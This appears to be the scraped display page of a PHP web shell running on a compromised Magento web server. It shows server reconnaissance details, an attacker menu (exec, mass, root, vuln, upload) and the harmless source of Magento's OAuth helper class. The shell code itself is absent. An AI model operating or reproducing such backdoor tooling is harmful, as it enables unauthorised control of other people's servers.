Kernel : Linux vmi616275.contaboserver.net 5.4.0-84-generic #94-Ubuntu SMP Thu Aug 26 20:27:37 UTC 2021 x86_64
Disable function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Safe mode : OFF
Host : diestoffstrasse.com | Server ip : 127.0.0.1 | Your ip : 127.0.0.1 | Time @ Server : 24 Aug 2025 08:05:50
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/dev2.destoffenstraat.com/vendor-1/magento/framework/Oauth/Helper/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/dev2.destoffenstraat.com/vendor-1/magento/framework/Oauth/Helper/Oauth.php

<?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ namespace Magento\Framework\Oauth\Helper; class Oauth { /** * #@+ * Lengths of token fields */ const LENGTH_TOKEN = 32; const LENGTH_TOKEN_SECRET = 32; const LENGTH_TOKEN_VERIFIER = 32; /**#@- */ /** * #@+ * Lengths of consumer fields */ const LENGTH_CONSUMER_KEY = 32; const LENGTH_CONSUMER_SECRET = 32; /**#@- */ /** * Nonce length */ const LENGTH_NONCE = 32; /** * Value of callback URL when it is established or if the client is unable to receive callbacks * * @link http://tools.ietf.org/html/rfc5849#section-2.1 Requirement in RFC-5849 */ const CALLBACK_ESTABLISHED = 'oob'; /** * @var \Magento\Framework\Math\Random */ protected $_mathRandom; /** * @param \Magento\Framework\Math\Random $mathRandom */ public function __construct(\Magento\Framework\Math\Random $mathRandom) { $this->_mathRandom = $mathRandom; } /** * Generate random string for token or secret or verifier * * @param int $length String length * @return string */ public function generateRandomString($length) { return $this->_mathRandom->getRandomString( $length, \Magento\Framework\Math\Random::CHARS_DIGITS . \Magento\Framework\Math\Random::CHARS_LOWERS ); } /** * Generate random string for token * * @return string */ public function generateToken() { return $this->generateRandomString(self::LENGTH_TOKEN); } /** * Generate random string for token secret * * @return string */ public function generateTokenSecret() { return $this->generateRandomString(self::LENGTH_TOKEN_SECRET); } /** * Generate random string for verifier * * @return string */ public function generateVerifier() { return $this->generateRandomString(self::LENGTH_TOKEN_VERIFIER); } /** * Generate random string for consumer key * * @return string */ public function generateConsumerKey() { return $this->generateRandomString(self::LENGTH_CONSUMER_KEY); } /** * Generate random string for consumer secret * * @return string */ public function generateConsumerSecret() { return $this->generateRandomString(self::LENGTH_CONSUMER_SECRET); } }